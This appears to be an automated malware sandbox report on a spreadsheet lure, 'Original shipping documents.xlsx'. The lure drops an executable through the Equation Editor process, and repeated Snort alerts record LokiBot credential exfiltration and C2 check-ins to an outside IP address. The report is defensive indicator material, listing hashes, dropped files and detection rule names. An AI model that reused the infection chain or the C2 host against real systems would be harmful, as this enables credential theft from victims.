                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89D14D5A.emf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):648132
                    Entropy (8bit):2.8123097603136196
                    Encrypted:false
                    SSDEEP:3072:234UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:44UcLe0JOcXuunhqcS
                    MD5:27E280B8E3E495E1824A39E0A2C1FA21
                    SHA1:B4CC1FCD9FF12A0DFA0C58D05EADDA92BD5C3EEA
                    SHA-256:DF2ED56094DC6AA5C2AF4974C2B1D93843E4DBE4627A7C18719B7A1025C4022A
                    SHA-512:94F203A4C6258DA1479C4906D9434280B59BCDA4644F31F3723313473966AE2A215EE1D206C9EC33FA5558ABF0F417680CA999B08F643ADAAB073D09889B624C
                    Malicious:false
                    Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................2X$........f<X.@F.%...\...................RQ.Y............l.......$Q.Y........ ...Id<X........ ............d<X........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X.......0....84X........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F23CC993.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):65050
                    Entropy (8bit):7.959940260382877
                    Encrypted:false
                    SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                    MD5:22335141D285E599CDAEF99EABA59D5B
                    SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                    SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                    SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                    Malicious:false
                    Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD34C19.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):33795
                    Entropy (8bit):7.909466841535462
                    Encrypted:false
                    SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                    MD5:613C306C3CC7C3367595D71BEECD5DE4
                    SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                    SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                    SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                    Malicious:false
                    Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                    C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)
                    Process:C:\Users\Public\vbc.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):210432
                    Entropy (8bit):6.97232515193582
                    Encrypted:false
                    SSDEEP:3072:2v+ArX9FLxOhanZBsX3PovEuKwEXLqfP6GB6klGfLIQVNWBz:6+KnIanZyHPoqqfSGB6k8Txql
                    MD5:59A67B5CCF01B6A564265797DC5E53E8
                    SHA1:996281D368FCC2CEFE5BF99399CCB19299C6F8FF
                    SHA-256:E4C1C0121487F83B014B8C81BBAF03DB0B7F49584A268A5E67CA64BA6E64676F
                    SHA-512:3BEB988E323C9A9F8DEB04E845DA157E34EC1F564B5CF8681A7ACA490A9FB5A1D4F1D4A10D80AD2D9C7D1742C56B93CFD113352FA80E38C4BAB46695C6F527CD
                    Malicious:false
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L...H..`.................l........................@.................................mk..................................O...,...<.... ...u..............................................................@...............|............................text... j.......l.................. ..`.rdata...1.......2...p..............@..@.data...|U..........................@....rsrc....u... ...v..................@..@........................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
                    Process:C:\Users\Public\vbc.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview: 1
                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                    Process:C:\Users\Public\vbc.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):25990
                    Entropy (8bit):0.6027050180179753
                    Encrypted:false
                    SSDEEP:12:seeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeJ:C
                    MD5:53580B7E5732A1219D4DA536B8FA2999
                    SHA1:9680D4CD528EECA7693619772320868789C3C4E4
                    SHA-256:F15B8D65C47C425332F15BB045DE3273C99AD53782D5F18333ACB8D60FF83418
                    SHA-512:E9F9B4F89D99034CEEB3D2F0D5D47F589818D8DD84F29FA9ACBD69DE120FF5D569853994B2EE88B08D240CD9BDD493AA3B79FED65F73B2AAAB43E9BF8A20474D
                    Malicious:false
                    Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................
                    C:\Users\user\Desktop\~$Original shipping documents.xlsx
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):330
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                    Malicious:false
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    C:\Users\Public\vbc.exe
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):210432
                    Entropy (8bit):6.97232515193582
                    Encrypted:false
                    SSDEEP:3072:2v+ArX9FLxOhanZBsX3PovEuKwEXLqfP6GB6klGfLIQVNWBz:6+KnIanZyHPoqqfSGB6k8Txql
                    MD5:59A67B5CCF01B6A564265797DC5E53E8
                    SHA1:996281D368FCC2CEFE5BF99399CCB19299C6F8FF
                    SHA-256:E4C1C0121487F83B014B8C81BBAF03DB0B7F49584A268A5E67CA64BA6E64676F
                    SHA-512:3BEB988E323C9A9F8DEB04E845DA157E34EC1F564B5CF8681A7ACA490A9FB5A1D4F1D4A10D80AD2D9C7D1742C56B93CFD113352FA80E38C4BAB46695C6F527CD
                    Malicious:true
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L...H..`.................l........................@.................................mk..................................O...,...<.... ...u..............................................................@...............|............................text... j.......l.................. ..`.rdata...1.......2...p..............@..@.data...|U..........................@....rsrc....u... ...v..................@..@........................................................................................................................................................................................................................................................................................................................................................

                    Static File Info

                    General

                    File type:CDFV2 Encrypted
                    Entropy (8bit):7.988412488949302
                    TrID:
                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                    File name:Original shipping documents.xlsx
                    File size:420472
                    MD5:27eb25e6fbbbd37115055ecc4b557c53
                    SHA1:4c986607a941900d9d8804aa351dcab0cc4de224
                    SHA256:09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab
                    SHA512:f2ece9c11a33e9bf9502f231a89e08256da67e1387b2707e76045fe51d3d0cc3e81d05a1bd2e380d39adbc0cefe8d60113b96b647813c64b7f1bded81ae230d2
                    SSDEEP:6144:fQOdpdVnGAWCDj4TvvuX2sNNtN+Por6ouj38cawe5kA0t8+yWENL/XfOmPKI:4O7cvCbNtUzP3jmiA06+l6Xf5
                    File Content Preview:........................>......................................................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2aa8aa4b4bcb4

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    09/28/21-06:50:29.583742TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916680192.168.2.225.188.89.50
                    09/28/21-06:50:29.583742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916680192.168.2.225.188.89.50
                    09/28/21-06:50:29.583742TCP2025381ET TROJAN LokiBot Checkin4916680192.168.2.225.188.89.50
                    09/28/21-06:50:29.583742TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916680192.168.2.225.188.89.50
                    09/28/21-06:50:30.225629TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916780192.168.2.225.188.89.50
                    09/28/21-06:50:30.225629TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916780192.168.2.225.188.89.50
                    09/28/21-06:50:30.225629TCP2025381ET TROJAN LokiBot Checkin4916780192.168.2.225.188.89.50
                    09/28/21-06:50:30.225629TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916780192.168.2.225.188.89.50
                    09/28/21-06:50:30.788969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916880192.168.2.225.188.89.50
                    09/28/21-06:50:30.788969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916880192.168.2.225.188.89.50
                    09/28/21-06:50:30.788969TCP2025381ET TROJAN LokiBot Checkin4916880192.168.2.225.188.89.50
                    09/28/21-06:50:30.788969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916880192.168.2.225.188.89.50
                    09/28/21-06:50:31.149317TCP2025483ET TROJAN LokiBot Fake 404 Response80491685.188.89.50192.168.2.22
                    09/28/21-06:50:31.556288TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916980192.168.2.225.188.89.50
                    09/28/21-06:50:31.556288TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916980192.168.2.225.188.89.50
                    09/28/21-06:50:31.556288TCP2025381ET TROJAN LokiBot Checkin4916980192.168.2.225.188.89.50
                    09/28/21-06:50:31.556288TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916980192.168.2.225.188.89.50
                    09/28/21-06:50:31.912452TCP2025483ET TROJAN LokiBot Fake 404 Response80491695.188.89.50192.168.2.22
                    09/28/21-06:50:33.578149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917080192.168.2.225.188.89.50
                    09/28/21-06:50:33.578149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917080192.168.2.225.188.89.50
                    09/28/21-06:50:33.578149TCP2025381ET TROJAN LokiBot Checkin4917080192.168.2.225.188.89.50
                    09/28/21-06:50:33.578149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917080192.168.2.225.188.89.50
                    09/28/21-06:50:33.930838TCP2025483ET TROJAN LokiBot Fake 404 Response80491705.188.89.50192.168.2.22
                    09/28/21-06:50:36.333900TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917180192.168.2.225.188.89.50
                    09/28/21-06:50:36.333900TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917180192.168.2.225.188.89.50
                    09/28/21-06:50:36.333900TCP2025381ET TROJAN LokiBot Checkin4917180192.168.2.225.188.89.50
                    09/28/21-06:50:36.333900TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917180192.168.2.225.188.89.50
                    09/28/21-06:50:36.694551TCP2025483ET TROJAN LokiBot Fake 404 Response80491715.188.89.50192.168.2.22
                    09/28/21-06:50:36.981514TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917280192.168.2.225.188.89.50
                    09/28/21-06:50:36.981514TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917280192.168.2.225.188.89.50
                    09/28/21-06:50:36.981514TCP2025381ET TROJAN LokiBot Checkin4917280192.168.2.225.188.89.50
                    09/28/21-06:50:36.981514TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917280192.168.2.225.188.89.50
                    09/28/21-06:50:37.329350TCP2025483ET TROJAN LokiBot Fake 404 Response80491725.188.89.50192.168.2.22
                    09/28/21-06:50:37.611743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917380192.168.2.225.188.89.50
                    09/28/21-06:50:37.611743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917380192.168.2.225.188.89.50
                    09/28/21-06:50:37.611743TCP2025381ET TROJAN LokiBot Checkin4917380192.168.2.225.188.89.50
                    09/28/21-06:50:37.611743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917380192.168.2.225.188.89.50
                    09/28/21-06:50:37.968483TCP2025483ET TROJAN LokiBot Fake 404 Response80491735.188.89.50192.168.2.22
                    09/28/21-06:50:38.271242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917480192.168.2.225.188.89.50
                    09/28/21-06:50:38.271242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917480192.168.2.225.188.89.50
                    09/28/21-06:50:38.271242TCP2025381ET TROJAN LokiBot Checkin4917480192.168.2.225.188.89.50
                    09/28/21-06:50:38.271242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917480192.168.2.225.188.89.50
                    09/28/21-06:50:38.657722TCP2025483ET TROJAN LokiBot Fake 404 Response80491745.188.89.50192.168.2.22
                    09/28/21-06:50:38.967765TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917580192.168.2.225.188.89.50
                    09/28/21-06:50:38.967765TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917580192.168.2.225.188.89.50
                    09/28/21-06:50:38.967765TCP2025381ET TROJAN LokiBot Checkin4917580192.168.2.225.188.89.50
                    09/28/21-06:50:38.967765TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917580192.168.2.225.188.89.50
                    09/28/21-06:50:39.323179TCP2025483ET TROJAN LokiBot Fake 404 Response80491755.188.89.50192.168.2.22
                    09/28/21-06:50:39.638770TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917680192.168.2.225.188.89.50
                    09/28/21-06:50:39.638770TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917680192.168.2.225.188.89.50
                    09/28/21-06:50:39.638770TCP2025381ET TROJAN LokiBot Checkin4917680192.168.2.225.188.89.50
                    09/28/21-06:50:39.638770TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917680192.168.2.225.188.89.50
                    09/28/21-06:50:40.025614TCP2025483ET TROJAN LokiBot Fake 404 Response80491765.188.89.50192.168.2.22
                    09/28/21-06:50:40.313216TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917780192.168.2.225.188.89.50
                    09/28/21-06:50:40.313216TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917780192.168.2.225.188.89.50
                    09/28/21-06:50:40.313216TCP2025381ET TROJAN LokiBot Checkin4917780192.168.2.225.188.89.50
                    09/28/21-06:50:40.313216TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917780192.168.2.225.188.89.50
                    09/28/21-06:50:40.677573TCP2025483ET TROJAN LokiBot Fake 404 Response80491775.188.89.50192.168.2.22
                    09/28/21-06:50:40.962632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917880192.168.2.225.188.89.50
                    09/28/21-06:50:40.962632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917880192.168.2.225.188.89.50
                    09/28/21-06:50:40.962632TCP2025381ET TROJAN LokiBot Checkin4917880192.168.2.225.188.89.50
                    09/28/21-06:50:40.962632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917880192.168.2.225.188.89.50
                    09/28/21-06:50:41.324284TCP2025483ET TROJAN LokiBot Fake 404 Response80491785.188.89.50192.168.2.22
                    09/28/21-06:50:41.640230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917980192.168.2.225.188.89.50
                    09/28/21-06:50:41.640230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917980192.168.2.225.188.89.50
                    09/28/21-06:50:41.640230TCP2025381ET TROJAN LokiBot Checkin4917980192.168.2.225.188.89.50
                    09/28/21-06:50:41.640230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917980192.168.2.225.188.89.50
                    09/28/21-06:50:42.012145TCP2025483ET TROJAN LokiBot Fake 404 Response80491795.188.89.50192.168.2.22
                    09/28/21-06:50:42.299756TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918080192.168.2.225.188.89.50
                    09/28/21-06:50:42.299756TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918080192.168.2.225.188.89.50
                    09/28/21-06:50:42.299756TCP2025381ET TROJAN LokiBot Checkin4918080192.168.2.225.188.89.50
                    09/28/21-06:50:42.299756TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918080192.168.2.225.188.89.50
                    09/28/21-06:50:42.665060TCP2025483ET TROJAN LokiBot Fake 404 Response80491805.188.89.50192.168.2.22
                    09/28/21-06:50:42.959616TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918180192.168.2.225.188.89.50
                    09/28/21-06:50:42.959616TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918180192.168.2.225.188.89.50
                    09/28/21-06:50:42.959616TCP2025381ET TROJAN LokiBot Checkin4918180192.168.2.225.188.89.50
                    09/28/21-06:50:42.959616TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918180192.168.2.225.188.89.50
                    09/28/21-06:50:43.342382TCP2025483ET TROJAN LokiBot Fake 404 Response80491815.188.89.50192.168.2.22
                    09/28/21-06:50:43.668918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918280192.168.2.225.188.89.50
                    09/28/21-06:50:43.668918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918280192.168.2.225.188.89.50
                    09/28/21-06:50:43.668918TCP2025381ET TROJAN LokiBot Checkin4918280192.168.2.225.188.89.50
                    09/28/21-06:50:43.668918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918280192.168.2.225.188.89.50
                    09/28/21-06:50:44.033988TCP2025483ET TROJAN LokiBot Fake 404 Response80491825.188.89.50192.168.2.22
                    09/28/21-06:50:44.317407TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918380192.168.2.225.188.89.50
                    09/28/21-06:50:44.317407TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918380192.168.2.225.188.89.50
                    09/28/21-06:50:44.317407TCP2025381ET TROJAN LokiBot Checkin4918380192.168.2.225.188.89.50
                    09/28/21-06:50:44.317407TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918380192.168.2.225.188.89.50
                    09/28/21-06:50:44.690879TCP2025483ET TROJAN LokiBot Fake 404 Response80491835.188.89.50192.168.2.22
                    09/28/21-06:50:44.980669TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918480192.168.2.225.188.89.50
                    09/28/21-06:50:44.980669TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918480192.168.2.225.188.89.50
                    09/28/21-06:50:44.980669TCP2025381ET TROJAN LokiBot Checkin4918480192.168.2.225.188.89.50
                    09/28/21-06:50:44.980669TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918480192.168.2.225.188.89.50
                    09/28/21-06:50:45.327651TCP2025483ET TROJAN LokiBot Fake 404 Response80491845.188.89.50192.168.2.22
                    09/28/21-06:50:45.606333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918580192.168.2.225.188.89.50
                    09/28/21-06:50:45.606333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918580192.168.2.225.188.89.50
                    09/28/21-06:50:45.606333TCP2025381ET TROJAN LokiBot Checkin4918580192.168.2.225.188.89.50
                    09/28/21-06:50:45.606333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918580192.168.2.225.188.89.50
                    09/28/21-06:50:45.970264TCP2025483ET TROJAN LokiBot Fake 404 Response80491855.188.89.50192.168.2.22
                    09/28/21-06:50:46.257926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918680192.168.2.225.188.89.50
                    09/28/21-06:50:46.257926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918680192.168.2.225.188.89.50
                    09/28/21-06:50:46.257926TCP2025381ET TROJAN LokiBot Checkin4918680192.168.2.225.188.89.50
                    09/28/21-06:50:46.257926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918680192.168.2.225.188.89.50
                    09/28/21-06:50:46.621851TCP2025483ET TROJAN LokiBot Fake 404 Response80491865.188.89.50192.168.2.22
                    09/28/21-06:50:46.934038TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918780192.168.2.225.188.89.50
                    09/28/21-06:50:46.934038TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918780192.168.2.225.188.89.50
                    09/28/21-06:50:46.934038TCP2025381ET TROJAN LokiBot Checkin4918780192.168.2.225.188.89.50
                    09/28/21-06:50:46.934038TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918780192.168.2.225.188.89.50
                    09/28/21-06:50:47.284598TCP2025483ET TROJAN LokiBot Fake 404 Response80491875.188.89.50192.168.2.22
                    09/28/21-06:50:47.567338TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918880192.168.2.225.188.89.50
                    09/28/21-06:50:47.567338TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918880192.168.2.225.188.89.50
                    09/28/21-06:50:47.567338TCP2025381ET TROJAN LokiBot Checkin4918880192.168.2.225.188.89.50
                    09/28/21-06:50:47.567338TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918880192.168.2.225.188.89.50
                    09/28/21-06:50:47.929216TCP2025483ET TROJAN LokiBot Fake 404 Response80491885.188.89.50192.168.2.22
                    09/28/21-06:50:48.217751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918980192.168.2.225.188.89.50
                    09/28/21-06:50:48.217751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918980192.168.2.225.188.89.50
                    09/28/21-06:50:48.217751TCP2025381ET TROJAN LokiBot Checkin4918980192.168.2.225.188.89.50
                    09/28/21-06:50:48.217751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918980192.168.2.225.188.89.50
                    09/28/21-06:50:48.600374TCP2025483ET TROJAN LokiBot Fake 404 Response80491895.188.89.50192.168.2.22
                    09/28/21-06:50:48.901348TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919080192.168.2.225.188.89.50
                    09/28/21-06:50:48.901348TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919080192.168.2.225.188.89.50
                    09/28/21-06:50:48.901348TCP2025381ET TROJAN LokiBot Checkin4919080192.168.2.225.188.89.50
                    09/28/21-06:50:48.901348TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919080192.168.2.225.188.89.50
                    09/28/21-06:50:49.275072TCP2025483ET TROJAN LokiBot Fake 404 Response80491905.188.89.50192.168.2.22
                    09/28/21-06:50:49.543983TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919180192.168.2.225.188.89.50
                    09/28/21-06:50:49.543983TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919180192.168.2.225.188.89.50
                    09/28/21-06:50:49.543983TCP2025381ET TROJAN LokiBot Checkin4919180192.168.2.225.188.89.50
                    09/28/21-06:50:49.543983TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919180192.168.2.225.188.89.50
                    09/28/21-06:50:49.910859TCP2025483ET TROJAN LokiBot Fake 404 Response80491915.188.89.50192.168.2.22
                    09/28/21-06:50:50.201147TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919280192.168.2.225.188.89.50
                    09/28/21-06:50:50.201147TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919280192.168.2.225.188.89.50
                    09/28/21-06:50:50.201147TCP2025381ET TROJAN LokiBot Checkin4919280192.168.2.225.188.89.50
                    09/28/21-06:50:50.201147TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919280192.168.2.225.188.89.50
                    09/28/21-06:50:50.559416TCP2025483ET TROJAN LokiBot Fake 404 Response80491925.188.89.50192.168.2.22
                    09/28/21-06:50:50.837246TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919380192.168.2.225.188.89.50
                    09/28/21-06:50:50.837246TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919380192.168.2.225.188.89.50
